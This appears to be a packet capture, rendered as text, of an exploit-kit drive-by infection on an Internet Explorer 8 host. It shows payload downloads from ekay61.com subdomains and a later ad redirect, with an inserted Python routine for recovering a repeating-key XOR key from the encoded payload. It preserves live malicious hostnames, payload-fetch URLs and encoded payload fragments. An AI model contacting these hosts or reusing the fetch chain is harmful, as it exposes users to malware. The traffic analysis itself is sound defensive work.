2014-12-31 21:42:09.473087 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [P.], seq 559:904, ack 1200, win 63041, length 345
E…..@…b…..C….D.PB.N…z.P..A.I..GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:09.473181 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [.], ack 904, win 64240, length 0
E..(.P……C……..P.D..z.B.P.P…di……..
2014-12-31 21:42:09.897184 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [P.], seq 1200:1448, ack 904, win 64240, length 248
E.. .^….
.C……..P.D..z.B.P.P…q…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:09 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:10.001528 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [P.], seq 1200:1448, ack 904, win 64240, length 248
E.. .b….
.C……..P.D..z.B.P.P…q…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:09 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:10.001548 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [.], ack 1448, win 62793, length 0
E..(..@…cn….C….D.PB.P…{.P..Ii………
2014-12-31 21:42:10.393964 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [S], seq 2079154230, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…c_….C….F.P{.`6…… . {…………..
2014-12-31 21:42:10.504995 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [S.], seq 1886175059, ack 2079154231, win 64240, options [mss 1460], length 0
E..,.t…..wC……..P.Fpl.S{.`7`…>………
2014-12-31 21:42:10.505149 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [.], ack 1, win 64240, length 0
E..(..@…cj….C….F.P{.`7pl.TP…V………
2014-12-31 21:42:10.505337 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 1:628, ack 1, win 64240, length 627
E…..@…`…..C….F.P{.`7pl.TP…….GET /V0ZWUUgDT0Y.html HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com/get_gift.php
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:10.505435 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 628, win 64240, length 0
E..(.u…..zC……..P.Fpl.T{.b.P…T………
2014-12-31 21:42:10.997894 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 1:1356, ack 628, win 64240, length 1355
E..s……..C……..P.Fpl.T{.b.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:10 GMT
Content-Type: text/html
Content-Length: 11958
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip
2014-12-31 21:42:11.444064 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 628:1109, ack 12190, win 64240, length 481
E.. ..@…a…..C….F.P{.b.pl..P…{…GET /AwoVGwUGAEEOVxlXDlRTBgIDQERTV1YOVFcDHAJBRUhdVlxXVA1OVRtA HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://jkarbqs789vhnmqzn919nhm.ekay61.com/V0ZWUUgDT0Y.html
x-flash-version: 11,2,202,228
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:11.444148 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 1109, win 64240, length 0
E..(…….SC……..P.Fpl..{.d.P…”………
2014-12-31 21:42:11.850562 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 12190:13642, ack 1109, win 64240, length 1452
E………..C……..P.Fpl..{.d.P….b..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:11 GMT
Content-Type: application/octet-stream
Content-Length: 23574
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436
2014-12-31 21:42:12.279040 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367
E…..@…a…..C….G.P…….;P…^P..GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT0IOFA0PIgY1QQ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:12.279170 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [.], ack 368, win 64240, length 0
E..(…….!C……..P.G…;….P…a………
2014-12-31 21:42:12.917561 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 1:1356, ack 368, win 64240, length 1355
E..s……..C……..P.G…;….P….m..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:12 GMT
Content-Type: application/octet-stream
Content-Length: 116010
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436

?2.P`RurliPc..rh.PcRurhi.cRurhiPcRurhiPcRurhiPcRurhiPcRurhiP.Rurfv.mR.{.H.b..S<.9.r….”.?U. .>.&U..I”.<U..I.,.U…5M_xxLiPcRurhX..h….%……9…….
‘……;….4…S..9…….
&…;9.:….PcRurhiPcRurhiPcRurhiPcR%7hi.bWu..s.cRurhiPc.u}ibQeRu,hiP.PurliP=`urhyPcR.rhiP#RubhiPaRuvhiPeRurliPcRurhi@gRuvhiPcRuphi.cRerhyPcRubhi@cRurhi@cRurhiPcRur..Pc.urhiPgR.thiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcR.rh.RcRurhiPcRurhiPcRurhiPcRurhG$.*.rhi.>RurxiPc.urhmPcRurhiPcRurhipcR.\..1.3ur.{PcR.rhiDcRu.hiPcRurhiPcRur(iP#|….PcR..jiP.RurliPc$urhiPcRurhiPcR5rh.~.6.. iPcBtrh.RcRurhiPcRurhiPcRurhiP.Ru.F.#.1urh.VcRurliPkRur.iPcRurhiPcRurh)Pc.urhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurh<…….\l&^..e…a.e..{B…..c.=v8.%s..~..X.G=.(i.!Sur;?.V..0h..
2014-12-31 21:42:12.962207 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 1356:1453, ack 368, win 64240, length 97
E………
2014-12-31 21:42:14.075223 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 1109:1476, ack 36029, win 64240, length 367
E…..@…a…..C….F.P{.d.pmL.P…m…GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT0IOEREoBC8bBg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:14.075379 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 1476, win 64240, length 0
E..(.`….
.C……..P.FpmL.{.e.P………….
2014-12-31 21:42:14.723101 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 36029:36277, ack 1476, win 64240, length 248
E.. .s…. .C……..P.FpmL.{.e.P….y..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:14 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:14.804312 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [P.], seq 368:729, ack 116277, win 64240, length 361
E…..@…a…..C….G.P…….oP….g..GET /AwoVGwUGAEEOVxlXDlRTBgIDQERTV1YOVFcDHAJBRUhdVlxXVA1OQB4eEAAU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:14.804411 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [.], ack 729, win 64240, length 0
E..(.w….
xC……..P.G…o…~P…./……..
2014-12-31 21:42:14.824979 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 36029:36277, ack 1476, win 64240, length 248
E.. .x…. .C……..P.FpmL.{.e.P….y..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:14 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:14.825096 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [.], ack 36277, win 63992, length 0
E..(..@…c…..C….F.P{.e.pmM.P………….
2014-12-31 21:42:15.355055 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 116277:117729, ack 729, win 64240, length 1452
E………..C……..P.G…o…~P…`]..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:15 GMT
Content-Type: application/octet-stream
Content-Length: 19011
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436
2014-12-31 21:42:16.024460 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 1476:1843, ack 36277, win 63992, length 367
E…..@…a…..C….F.P{.e.pmM.P….*..GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT08OFA0PIgY1QQ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:16.024544 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 1843, win 64240, length 0
E..(……
CC……..P.FpmM.{.giP………….
2014-12-31 21:42:17.665580 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 36277:37729, ack 1843, win 64240, length 1452
E……….aC……..P.FpmM.{.giP…t…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:17 GMT
Content-Type: application/octet-stream
Content-Length: 116010
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436

?2.P`RurliPc..rh.PcRurhi.cRurhiPcRurhiPcRurhiPcRurhiPcRurhiP.Rurfv.mR.{.H.b..S<.9.r….”.?U. .>.&U..I”.<U..I.,.U…5M_xxLiPcRurhX..h….%……9…….
‘……;….4…S..9…….
&…;9.:….PcRurhiPcRurhiPcRurhiPcR%7hi.bWu..s.cRurhiPc.u}ibQeRu,hiP.PurliP=`urhyPcR.rhiP#RubhiPaRuvhiPeRurliPcRurhi@gRuvhiPcRuphi.cRerhyPcRubhi@cRurhi@cRurhiPcRur..Pc.urhiPgR.thiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcR.rh.RcRurhiPcRurhiPcRurhiPcRurhG$.*.rhi.>RurxiPc.urhmPcRurhiPcRurhipcR.\..1.3ur.{PcR.rhiDcRu.hiPcRurhiPcRur(iP#|….PcR..jiP.RurliPc$urhiPcRurhiPcR5rh.~.6.. iPcBtrh.RcRurhiPcRurhiPcRurhiP.Ru.F.#.1urh.VcRurliPkRur.iPcRurhiPcRurh)Pc.urhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurh<…….\l&^..e…a.e..{B…..c.=v8.%s..~..X.G=.(i.!Sur;?.V..0h….%..a.v..2h.5.R.7d……`.E3 5r….7.r.t…u..iPc].4:f.5.z.=…y8.g..`..?x…a…f.%.z..f.-.z.%.
2014-12-31 21:42:18.763101 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [.], ack 152553, win 64240, length 0
E..(..@…b…..C….F.P{.gipo.<P….i……..
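The two application/octet-stream downloads above (Content-Length 116010, "Content-Disposition: inline; filename=1436") show a long run of the seven characters PcRurhi repeating in the body. That is the footprint a repeating-key XOR leaves over a stretch of 0x00 plaintext bytes, such as the zero padding between the headers and sections of a PE file; treating the body that way is my inference from the dump, not something the page states, and the page does not say how the payload is encoded. The following is an added example, not code from the page's author, of the standard recovery step: find the period of the repeating run, assume the dominant plaintext byte in each key position is 0x00, and read the key off the most frequent ciphertext byte per position. PAGE_FRAGMENT is a substring copied from the body above; PLAINTEXT, KEY and CIPHERTEXT are constructed test data and every name is my own.

```python
"""Candidate repeating-key XOR recovery for an obfuscated download body.
Assumption (mine, not stated on the page): a long run of the same short byte
sequence in the ciphertext is a run of 0x00 plaintext bytes XORed with a
repeating key, as the zero padding of a PE file would produce."""
from collections import Counter


def find_period(data, max_period=32, min_repeats=8):
    """Smallest period p such that some p-byte chunk of data repeats
    back-to-back at least min_repeats times; None if there is no such run."""
    for p in range(1, max_period + 1):
        run = p * min_repeats
        for i in range(len(data) - run + 1):
            if data[i:i + run] == data[i:i + p] * min_repeats:
                return p
    return None


def recover_key(data, period, plaintext_byte=0x00):
    """For each key position take the most frequent ciphertext byte and XOR it
    with the assumed dominant plaintext byte. The result is aligned to offset
    0 of data; on a fragment cut from the middle of a file it is the true key
    only up to rotation."""
    key = bytearray(period)
    for i in range(period):
        byte, _count = Counter(data[i::period]).most_common(1)[0]
        key[i] = byte ^ plaintext_byte
    return bytes(key)


def xor(data, key):
    """Apply a repeating-key XOR (it is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Substring copied from the octet-stream body in the capture above.
PAGE_FRAGMENT = b"PcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhi"

# Constructed stand-in for a small executable: a two-byte magic, a long run of
# zero padding, a block of non-zero data and more padding, XORed with a key
# chosen to match the pattern in the capture. Not the real payload.
KEY = b"PcRurhi"
PLAINTEXT = b"MZ" + bytes(200) + bytes(range(1, 64)) + bytes(40)
CIPHERTEXT = xor(PLAINTEXT, KEY)


def decode_sample():
    """Recover the key from CIPHERTEXT alone and return the decoded bytes."""
    period = find_period(CIPHERTEXT)
    return xor(CIPHERTEXT, recover_key(CIPHERTEXT, period))


if __name__ == "__main__":
    print("period in page fragment:", find_period(PAGE_FRAGMENT))
    print("key aligned to fragment:", recover_key(PAGE_FRAGMENT, 7))
    print("period in constructed sample:", find_period(CIPHERTEXT))
    print("recovered key:", recover_key(CIPHERTEXT, find_period(CIPHERTEXT)))
    print("decoded sample starts with:", decode_sample()[:2])
```

On the page fragment alone the method yields period 7 and the key PcRurhi in the alignment of that fragment; which rotation is correct, and whether the first bytes of the decoded file are a valid MZ/PE header, can only be checked against the full body from the pcap, which is the test to run before trusting the result. If the decoded bytes do not start with MZ for any of the seven rotations, the zero-run assumption is wrong for this sample and a different dominant plaintext byte (or a different scheme altogether) has to be tried.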
2014-12-31 21:42:18.771275 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [P.], seq 729:1096, ack 135553, win 64240, length 367
E…..@…a…..C….G.P…~….P….)..GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT08OEREoBC8bBg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:18.771333 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [.], ack 1096, win 64240, length 0
E..(.]…. .C……..P.G……..P…Mt……..
2014-12-31 21:42:19.272154 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 135553:135801, ack 1096, win 64240, length 248
E.. .m……C……..P.G……..P…Z…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:19 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:19.374706 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 135553:135801, ack 1096, win 64240, length 248
E.. .q……C……..P.G……..P…Z…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:19 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:19.374775 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [.], ack 135801, win 63992, length 0
E..(..@…b…..C….G.P……..P…Mt……..
2014-12-31 21:42:29.877240 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [S], seq 1960259095, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…b…..C….H.Pt……… .Y……………
2014-12-31 21:42:29.988075 IP 67.215.2.195.80 > 192.168.138.158.49224: Flags [S.], seq 3470477649, ack 1960259096, win 64240, options [mss 1460], length 0
E..,…….@C……..P.H..IQt…`………….
2014-12-31 21:42:29.988166 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [.], ack 1, win 64240, length 0
E..(..@…b…..C….H.Pt…..IRP….L……..
2014-12-31 21:42:29.988343 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [P.], seq 1:561, ack 1, win 64240, length 560
E..X..@…`…..C….H.Pt…..IRP…7…GET /get_ads.php?yy=1&aid=2&atr=exts&src=275 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 01naxtw68121x3lwjuw6z7p.escortbayanlar.pro
Connection: Keep-Alive
2014-12-31 21:42:30.541496 IP 67.215.2.195.80 > 192.168.138.158.49224: Flags [P.], seq 1:335, ack 561, win 64240, length 334
E..v……..C……..P.H..IRt.0HP…Y…HTTP/1.1 302 Found
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2015 01:42:30 +0000
X-Frame-Options: DENY
Location: http://adultfriendfinder.com/go/p1011105.subexts
2014-12-31 21:42:30.589648 IP 67.215.2.195.80 > 192.168.138.158.49224: Flags [P.], seq 335:340, ack 561, win 64240, length 5
E..-…….*C……..P.H..J.t.0HP…_…0

.
2014-12-31 21:42:30.589715 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [.], ack 340, win 63901, length 0
E..(..@…b…..C….H.Pt.0H..J.P………….
2014-12-31 21:42:34.809493 IP 192.168.138.158.49225 > 208.88.180.72.80: Flags [S], seq 877620194, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…$……X.H.I.P4Ok……. ..c…………..
2014-12-31 21:42:34.902318 IP 208.88.180.72.80 > 192.168.138.158.49225: Flags [S.], seq 2943029486, ack 877620195, win 64240, options [mss 1460], length 0
E..,.D…….X.H…..P.I.k..4Ok.`………….
2014-12-31 21:42:34.902426 IP 192.168.138.158.49225 > 208.88.180.72.80: Flags [.], ack 1, win 64240, length 0
E..(..@…$……X.H.I.P4Ok..k..P………….
2014-12-31 21:42:34.902662 IP 192.168.138.158.49225 > 208.88.180.72.80: Flags [P.], seq 1:520, ack 1, win 64240, length 519
E../..@…”……X.H.I.P4Ok..k..P…<…GET /go/p1011105.subexts HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: adultfriendfinder.com
Connection: Keep-Alive
2014-12-31 21:42:34.902749 IP 208.88.180.72.80 > 192.168.138.158.49225: Flags [.], ack 520, win 64240, length 0
E..(.E…….X.H…..P.I.k..4Om.P………….
2014-12-31 21:42:35.273381 IP 208.88.180.72.80 > 192.168.138.158.49225: Flags [P.], seq 1:1110, ack 520, win 64240, length 1109
E..}.P…..B.X.H…..P.I.k..4Om.P…….HTTP/1.1 302 Found
Date: Thu, 01 Jan 2015 01:42:34 GMT
Server: Apache
X-PERF: 0.189873,0.049631,DB_20_0.0209290,CD_19_0.0051770,PK_2_0.0715360,CE_23_0.0426000
Location: http://adultfriendfinder.com/go/page/landing_page_68?nid=14&layout=qna&pid=p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
Set-Cookie: ALPO=106676411; path=/; domain=.adultfriendfinder.com; expires=Fri, 02-Jan-2015 01:42:35 GMT
Set-Cookie: click_id_time=960008297_2014-12-31 17:42:35; path=/; domain=.adultfriendfinder.com; expires=Sat, 31-Jan-2015 01:42:35 GMT
Set-Cookie: AB_TRACKING=2PhNkokiaeSDXFlH28j8YD; path=/; domain=.adultfriendfinder.com; expires=Sat, 31-Jan-2015 01:42:35 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 270
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

……….-.=O.0….
